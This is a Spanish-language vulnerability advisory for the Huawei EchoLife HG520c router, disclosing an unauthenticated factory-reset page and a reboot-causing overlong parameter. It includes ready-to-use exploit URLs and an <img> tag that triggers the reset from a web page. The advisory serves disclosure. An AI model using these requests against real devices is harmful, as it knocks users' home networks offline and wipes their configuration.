=====================================================
        HUAWEI ECHOLIFE HG520c Denegacion de Servicio y Reset 
        =====================================================

Dispositivo:		Huawei EchoLife HG520c
Version de Software:	V100R001B021Telmex
			V100R001B020Telmex
Version de Firmware:	3.10.18.7-1.0.7.0 (ultima version)
			3.10.18.5-1.0.7.0
Modelos Vulnerables:	HG520c
Fecha de publicacion:	2010-03-28
Criticidad: 		Alto
Impacto: 		Restaura configuracion por defecto
			Denegacion de servicio
			Denegacion de servicio remoto
Ubicacion:		En la interfaz de administracion web (LAN/WAN)
Solucion:		No existe solucion disponible en este momento

______________________________________________________________________

 [Descripcion]
=================
La funcion de la pagina '/AutoRestart.html' es restaurar la configuracion
por defecto y reiniciar el dispositivo. Es posible acceder a esta pagina
sin estar autenticado.

 [Exploit]
=================
Desde la LAN o via Client-Side se puede realizar una peticion tipo GET a
la pagina '/AutoRestart.html':

  http://192.168.1.254/AutoRestart.html

  <img src=http://192.168.1.254/AutoRestart.html>

De forma remota, en caso de tener la interfaz web habilitada en la WAN:

  http://<IP REMOTA>/AutoRestart.html
______________________________________________________________________

 [Descripcion 2]
=================
La pagina '/rpLocalDeviceJump.html' puede causar una denegacion de servicio
reiniciando el dispositivo si se envia la variable 'index' con una longitud
> a 7 caracteres. Requiere autenticacion.

 [Exploit 2]
=================
 http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS
______________________________________________________________________


Saludos a Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, 
Chito, Kike, House, Aldo, Chewi, Alex, Paco.


hkm

hkm@hakim.ws